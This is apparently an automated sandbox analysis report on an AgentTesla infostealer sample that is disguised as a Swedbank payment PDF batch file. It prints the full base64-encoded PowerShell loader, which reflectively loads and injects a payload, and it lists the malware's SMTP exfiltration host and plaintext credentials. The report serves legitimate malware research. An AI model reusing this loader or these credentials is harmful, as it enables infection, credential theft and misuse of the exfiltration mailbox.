Analysis
-
max time kernel
147s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
28-03-2024 01:11
Static task
static1
Behavioral task
behavioral1
Sample
Maksajuma Kopija_ Swedbank_Pdf.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Maksajuma Kopija_ Swedbank_Pdf.bat
Resource
win10v2004-20240226-en
General
-
Target
Maksajuma Kopija_ Swedbank_Pdf.bat
-
Size
191KB
-
MD5
235301817498be96c6d65a417cc443c7
-
SHA1
7521769e3b245c2569fb1fa712762fcbdfdf604d
-
SHA256
51f353ec3f19b4fc3acc056ae3dc07247e7b3a212c68149cdb08c7d0c62b4d2d
-
SHA512
94fb845b5fd5ef8d34ed1c8e49ec3670da6ff9bf316bf445745081a62696ccc713d1fa1ae4c325f3647103bc4adf892e5f2fd4eda64075e6dd2ed2d6a2b2ff81
-
SSDEEP
3072:MLP9R7YyEyEAxFAAa37c8eX8Y2y/429sqhKp6ua5u1iCZyNRZU8cLndj:MR7YpAxjWc8eX9/42NhEa50ezcLndj
Malware Config
Extracted
Protocol: smtp- Host:
mail.aist.lv - Port:
587 - Username:
[email protected] - Password:
WoodIsaev88
Extracted
agenttesla
Protocol: smtp- Host:
mail.aist.lv - Port:
587 - Username:
[email protected] - Password:
WoodIsaev88 - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 29 api.ipify.org 30 api.ipify.org 32 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2700 set thread context of 2032 2700 powershell.exe RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exepid process 3108 powershell.exe 3108 powershell.exe 2700 powershell.exe 2700 powershell.exe 2032 RegAsm.exe 2032 RegAsm.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3108 powershell.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2032 RegAsm.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
cmd.execmd.exepowershell.exedescription pid process target process PID 1276 wrote to memory of 3224 1276 cmd.exe cmd.exe PID 1276 wrote to memory of 3224 1276 cmd.exe cmd.exe PID 3224 wrote to memory of 3108 3224 cmd.exe powershell.exe PID 3224 wrote to memory of 3108 3224 cmd.exe powershell.exe PID 3224 wrote to memory of 3108 3224 cmd.exe powershell.exe PID 3224 wrote to memory of 2700 3224 cmd.exe powershell.exe PID 3224 wrote to memory of 2700 3224 cmd.exe powershell.exe PID 3224 wrote to memory of 2700 3224 cmd.exe powershell.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe PID 2700 wrote to memory of 2032 2700 powershell.exe RegAsm.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Maksajuma Kopija_ Swedbank_Pdf.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Maksajuma Kopija_ Swedbank_Pdf.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3108 -
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\-temp.batFilesize
191KB
MD5235301817498be96c6d65a417cc443c7
SHA17521769e3b245c2569fb1fa712762fcbdfdf604d
SHA25651f353ec3f19b4fc3acc056ae3dc07247e7b3a212c68149cdb08c7d0c62b4d2d
SHA51294fb845b5fd5ef8d34ed1c8e49ec3670da6ff9bf316bf445745081a62696ccc713d1fa1ae4c325f3647103bc4adf892e5f2fd4eda64075e6dd2ed2d6a2b2ff81
-
C:\Users\Admin\-temp.ps1Filesize
1KB
MD5ee6d2d219d1affb98fb9dc1de51d895e
SHA1aaa2ceb5f7214c76b8a050a06d257cdc30d6bb48
SHA256017fb2bedc94f0480d208611df6b42589d407fc4338e1f5dc1e00a9fd52752e0
SHA51252139b56af32835b93fb8eb93b553325e36654debe5c15e6b61930ffe8027e0ee5eb0998da4c37ec047c052522a022d7103c33d7495eb1a3504cfee1780229bf
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
16KB
MD5d3b7308e69bb0826a24e611ca6ff784f
SHA1e44e0e7b23f35378e333f08af356fa79b10e25fd
SHA256ff9502614392a1bf3fc69de442a6b6d097666ece48612ed783f62ea58bc9ca3a
SHA51224dcf879649a071d7893f35297749d217b21851bebd22f0d2435edb251960f975a0b8478961f81fc1e268eca6376621bf70ee0d3d9c30f2e74941ea4d6174772
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i5kolqn1.fpf.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/2032-52-0x0000000000400000-0x0000000000442000-memory.dmpFilesize
264KB
-
memory/2032-55-0x0000000005930000-0x0000000005940000-memory.dmpFilesize
64KB
-
memory/2032-62-0x0000000005930000-0x0000000005940000-memory.dmpFilesize
64KB
-
memory/2032-61-0x0000000075220000-0x00000000759D0000-memory.dmpFilesize
7.7MB
-
memory/2032-60-0x0000000006F20000-0x0000000006F2A000-memory.dmpFilesize
40KB
-
memory/2032-59-0x0000000007010000-0x00000000070A2000-memory.dmpFilesize
584KB
-
memory/2032-58-0x0000000006F70000-0x000000000700C000-memory.dmpFilesize
624KB
-
memory/2032-57-0x0000000006E80000-0x0000000006ED0000-memory.dmpFilesize
320KB
-
memory/2032-54-0x0000000075220000-0x00000000759D0000-memory.dmpFilesize
7.7MB
-
memory/2700-30-0x00000000021B0000-0x00000000021C0000-memory.dmpFilesize
64KB
-
memory/2700-56-0x0000000075220000-0x00000000759D0000-memory.dmpFilesize
7.7MB
-
memory/2700-49-0x0000000006F50000-0x0000000006FB4000-memory.dmpFilesize
400KB
-
memory/2700-29-0x0000000075220000-0x00000000759D0000-memory.dmpFilesize
7.7MB
-
memory/2700-31-0x00000000021B0000-0x00000000021C0000-memory.dmpFilesize
64KB
-
memory/2700-41-0x0000000005680000-0x00000000059D4000-memory.dmpFilesize
3.3MB
-
memory/2700-51-0x0000000077C41000-0x0000000077D61000-memory.dmpFilesize
1.1MB
-
memory/2700-50-0x0000000000950000-0x000000000095A000-memory.dmpFilesize
40KB
-
memory/2700-44-0x00000000021B0000-0x00000000021C0000-memory.dmpFilesize
64KB
-
memory/2700-45-0x0000000006D90000-0x0000000006E26000-memory.dmpFilesize
600KB
-
memory/2700-46-0x0000000006150000-0x0000000006172000-memory.dmpFilesize
136KB
-
memory/2700-47-0x0000000007490000-0x0000000007A34000-memory.dmpFilesize
5.6MB
-
memory/3108-27-0x0000000075220000-0x00000000759D0000-memory.dmpFilesize
7.7MB
-
memory/3108-3-0x0000000075220000-0x00000000759D0000-memory.dmpFilesize
7.7MB
-
memory/3108-4-0x0000000004CA0000-0x0000000004CB0000-memory.dmpFilesize
64KB
-
memory/3108-5-0x00000000052E0000-0x0000000005908000-memory.dmpFilesize
6.2MB
-
memory/3108-2-0x0000000004B80000-0x0000000004BB6000-memory.dmpFilesize
216KB
-
memory/3108-6-0x0000000005180000-0x00000000051A2000-memory.dmpFilesize
136KB
-
memory/3108-7-0x0000000005220000-0x0000000005286000-memory.dmpFilesize
408KB
-
memory/3108-23-0x00000000064A0000-0x00000000064BA000-memory.dmpFilesize
104KB
-
memory/3108-22-0x00000000078B0000-0x0000000007F2A000-memory.dmpFilesize
6.5MB
-
memory/3108-21-0x0000000004CA0000-0x0000000004CB0000-memory.dmpFilesize
64KB
-
memory/3108-20-0x0000000005FA0000-0x0000000005FEC000-memory.dmpFilesize
304KB
-
memory/3108-19-0x0000000005F60000-0x0000000005F7E000-memory.dmpFilesize
120KB
-
memory/3108-18-0x0000000005A80000-0x0000000005DD4000-memory.dmpFilesize
3.3MB
-
memory/3108-13-0x0000000005A00000-0x0000000005A66000-memory.dmpFilesize
408KB